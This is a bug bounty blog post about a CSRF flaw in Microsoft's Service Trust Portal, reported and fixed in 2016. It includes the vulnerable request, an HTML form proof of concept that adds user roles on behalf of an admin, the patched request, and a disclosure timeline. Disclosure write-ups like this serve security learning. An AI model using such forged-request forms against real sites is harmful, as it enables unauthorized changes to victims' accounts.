In this blog post I will show you one of the easy CSRF Bug which I Found on Microsoft Platform, not only that, I will reiterate why it is important to keep trying.
If you are my follower @Twitter then you must be knowing I sometimes sorry regularly tweet about NeverGiveUp sort of tweets the best reason I can tell you by giving example of my experience with Microsoft Bug bounty Program.
Talking about Microsoft bug bounty first point they only accept submission which is high impact. Big `NO` to low hanging fruits and big `NO` if you can not exploit the bug. I reported 10+ bug reports to Microsoft security team this includes some low hanging fruits and some bugs which I was not able to exploit. All marked as NA. Well its but obvious after all this failure when my mind tells me to give up on this, I tell myself.
So After spending hours,days and months I finally got the HIT call SUCCESS.
(Keep Trying #NeverGiveUp)
Lets move towards POC.
Introduction:-
I was testing one of Microsoft domain - Service Trust Portal (STP).
During the testing, I came across below feature in their portal where you can add Portal users and Portal admin.
The Add User feature caught my attention, generally speaking while checking out the application I always try to correlate application work flow with respect to different attack vector which I can execute (Some tips to try in a wild ...XD) , so that time straight away I though about CSRF.
POC:-
HTTP Request:-
GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive
From above HTTP Request we conclude that there is no CSRF token present.
This way by using this loophole I was able to Add User roles on behalf of admin user.
Exploitation:-
<html>
<body>
<form action="https://trustportal.office.com/onboarding/AddUserRole/1110">
<input type="hidden" name="role" value="User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
So I was able to add any user in their Cloud Service Trust Portal by using CSRF Attack.
How they fix it:-
POST /onboarding/AddUserRole HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Content-Length: 29
Cookie: [Some_value]
Connection: keep-alive
{"user":"test","role":"User"}
They listed me in their Hall Of Fame and Rewarded me with the bounty.
Moral Of The Story:-
Stay focused, Don't Quit, keep trying #BelieveThat
Time-Line:
Vulnerability timeline:
Feb 14, 2016 : Reported to Microsoft Security Response Center.
Feb 20, 2016 : Received initial reply from Microsoft Team. Report Triaged
Feb 25, 2016 : Microsoft Security Team successfully reproduced the bug.
Mar 16, 2016 : Microsoft Security Team Fixed the reported bug.
Apr 01, 2016 : Bounty Awarded of $500 by Microsoft
June 19, 2016 : Public responsible disclosure